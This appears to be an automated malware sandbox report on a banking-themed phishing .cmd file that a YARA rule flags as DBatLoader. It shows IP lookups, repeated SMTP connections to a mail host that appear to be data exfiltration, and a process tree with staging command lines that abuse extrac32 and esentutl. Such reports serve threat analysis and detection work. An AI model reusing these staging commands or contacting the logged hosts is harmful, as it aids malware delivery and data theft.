                                                                                                                              2024-11-13 15:28:03 UTC16384INData Raw: 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65
                                                                                                                              Data Ascii: rm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52e
                                                                                                                              2024-11-13 15:28:03 UTC387INData Raw: 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70 71 35 79 35 73 72 65 35 75 4b 65 67 71 36 4b 66 75 61 4f 66 73 37 69 6d 75 4b 65 34 73 35 32 65 74 62 65 79 71 37 53 31 73 4c 53 34 75 35 36 66 73 4b 57 70 71 36 6d 64 70 72 6d 77 73 72 71 79 74 71 57 6f 6f 37 6d 70 73 71 65 77 73 4c 65 33 75 72 6d 33 74 4c 65 6d 73 71 4f 64 73 36 47 7a 75 71 69 6d 6f 4b 65 64 6e 61 43 79 71 4b 57 37 71 36 69 67 75 4a 32 72 74 37 61 37 75 71 53 30 73 4c 71 70 6e 62 4f 31 6e 61 6d 77 6e 37 53 77 6f 4b 53 69 73 72 69 70
                                                                                                                              Data Ascii: KWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisripq5y5sre5uKegq6KfuaOfs7imuKe4s52etbeyq7S1sLS4u56fsKWpq6mdprmwsrqytqWoo7mpsqewsLe3urm3tLemsqOds6GzuqimoKednaCyqKW7q6iguJ2rt7a7uqS0sLqpnbO1namwn7SwoKSisrip


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.549706104.26.12.2054436564C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-13 15:28:15 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-13 15:28:15 UTC397INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 13 Nov 2024 15:28:15 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 14
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e1fca610d8c943e-SJC
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=39321&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=73603&cwnd=32&unsent_bytes=0&cid=eb3f7927beff8025&ts=384&x=0"
                                                                                                                              2024-11-13 15:28:15 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32
                                                                                                                              Data Ascii: 173.254.250.82


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.549755104.26.12.2054437536C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-13 15:28:26 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-13 15:28:26 UTC399INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 13 Nov 2024 15:28:26 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 14
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e1fcaa73d7f0c07-DFW
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1419&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=2035137&cwnd=245&unsent_bytes=0&cid=efa4cf25148cedbd&ts=235&x=0"
                                                                                                                              2024-11-13 15:28:26 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32
                                                                                                                              Data Ascii: 173.254.250.82


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.549791104.26.12.2054437824C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-11-13 15:28:35 UTC155OUTGET / HTTP/1.1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                              Host: api.ipify.org
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-11-13 15:28:36 UTC397INHTTP/1.1 200 OK
                                                                                                                              Date: Wed, 13 Nov 2024 15:28:36 GMT
                                                                                                                              Content-Type: text/plain
                                                                                                                              Content-Length: 14
                                                                                                                              Connection: close
                                                                                                                              Vary: Origin
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8e1fcae1494d643e-SJC
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=41210&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=70362&cwnd=32&unsent_bytes=0&cid=7e4f2c58643e2b86&ts=565&x=0"
                                                                                                                              2024-11-13 15:28:36 UTC14INData Raw: 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 32
                                                                                                                              Data Ascii: 173.254.250.82


                                                                                                                              TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                              Nov 13, 2024 16:28:18.608449936 CET5874970851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:18 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:18.608804941 CET49708587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:28:18.849797964 CET5874970851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:28:18.856316090 CET49708587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:28:19.098189116 CET5874970851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:28:22.621243000 CET5874973151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:22 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:22.621380091 CET49731587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:28:22.869749069 CET5874973151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:28:22.869888067 CET49731587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:28:23.119683027 CET5874973151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:28:29.391102076 CET5874976751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:29 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:29.391350985 CET49767587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:28:29.630789995 CET5874976751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:28:29.630927086 CET49767587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:28:29.871548891 CET5874976751.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:28:34.571944952 CET5874978651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:34 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:34.978404045 CET5874978651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:34 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:37.976600885 CET5874980251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:37 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:37.976844072 CET49802587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:28:38.221750021 CET5874980251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:28:38.251254082 CET49802587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:28:38.495523930 CET5874980251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:28:41.982292891 CET5874982351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:28:41 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:28:41.982430935 CET49823587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:28:42.223768950 CET5874982351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:28:42.223901987 CET49823587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:28:42.465934992 CET5874982351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:30:25.439933062 CET5874998851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:25 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:30:25.440191984 CET49988587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:30:25.679569960 CET5874998851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:30:25.679738998 CET49988587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:30:25.920582056 CET5874998851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:30:37.045639992 CET5874998951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:36 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:30:37.049530983 CET49989587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:30:37.295859098 CET5874998951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:30:37.301501036 CET49989587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:30:37.551120043 CET5874998951.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:30:47.764328003 CET5874999051.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:30:47 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:30:47.764468908 CET49990587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:30:48.016486883 CET5874999051.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:30:48.016642094 CET49990587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:30:48.261116028 CET5874999051.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:01.417921066 CET5874999151.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:01 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:01.418292999 CET49991587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:01.658363104 CET5874999151.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:01.658621073 CET49991587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:01.899732113 CET5874999151.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:10.206183910 CET5874999251.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:10 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:10.206530094 CET49992587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:10.451833010 CET5874999251.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:10.452092886 CET49992587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:10.698582888 CET5874999251.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:22.510297060 CET5874999351.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:22 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:22.510445118 CET49993587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:22.754071951 CET5874999351.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:22.757504940 CET49993587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:23.001008987 CET5874999351.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:25.198313951 CET5874999451.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:25 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:25.198990107 CET49994587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:25.441014051 CET5874999451.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:25.441217899 CET49994587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:25.685184002 CET5874999451.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:32.891438961 CET5874999551.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:32 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:32.904699087 CET49995587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:33.143227100 CET5874999551.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:33.145606995 CET49995587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:33.402697086 CET5874999551.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:45.756318092 CET5874999651.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:45 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:45.756483078 CET49996587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:45.999854088 CET5874999651.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:46.000022888 CET49996587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:46.243091106 CET5874999651.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:49.321707010 CET5874999751.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:48 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:49.326919079 CET49997587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:49.574918985 CET5874999751.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:49.577560902 CET49997587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:49.826091051 CET5874999751.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:31:53.996834040 CET5874999851.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:31:53 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:31:53.996993065 CET49998587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:31:54.239223957 CET5874999851.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:31:54.239590883 CET49998587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:31:54.481161118 CET5874999851.195.88.199192.168.2.5220 TLS go ahead
                                                                                                                              Nov 13, 2024 16:32:13.574069977 CET5874999951.195.88.199192.168.2.5220-s82.gocheapweb.com ESMTP Exim 4.97.1 #2 Wed, 13 Nov 2024 15:32:13 +0000
                                                                                                                              220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                              220 and/or bulk e-mail.
                                                                                                                              Nov 13, 2024 16:32:13.574223042 CET49999587192.168.2.551.195.88.199EHLO 675052
                                                                                                                              Nov 13, 2024 16:32:13.819650888 CET5874999951.195.88.199192.168.2.5250-s82.gocheapweb.com Hello 675052 [173.254.250.82]
                                                                                                                              250-SIZE 52428800
                                                                                                                              250-8BITMIME
                                                                                                                              250-PIPELINING
                                                                                                                              250-PIPECONNECT
                                                                                                                              250-STARTTLS
                                                                                                                              250 HELP
                                                                                                                              Nov 13, 2024 16:32:13.820188046 CET49999587192.168.2.551.195.88.199STARTTLS
                                                                                                                              Nov 13, 2024 16:32:14.077152014 CET5874999951.195.88.199192.168.2.5220 TLS go ahead

                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:10:27:59
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "
                                                                                                                              Imagebase:0x7ff643a50000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:1
                                                                                                                              Start time:10:27:59
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:10:27:59
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\extrac32.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:extrac32 /y "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                              Imagebase:0x7ff6cf1e0000
                                                                                                                              File size:35'328 bytes
                                                                                                                              MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:10:27:59
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'224'192 bytes
                                                                                                                              MD5 hash:86EE0E8789E9C11F707D056C4052292E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000004.00000003.2063002452.000000007FAE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 21%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:10:28:08
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\lxsyrsiW.cmd" "
                                                                                                                              Imagebase:0x790000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:10:28:08
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff6d64d0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:10:28:09
                                                                                                                              Start date:13/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
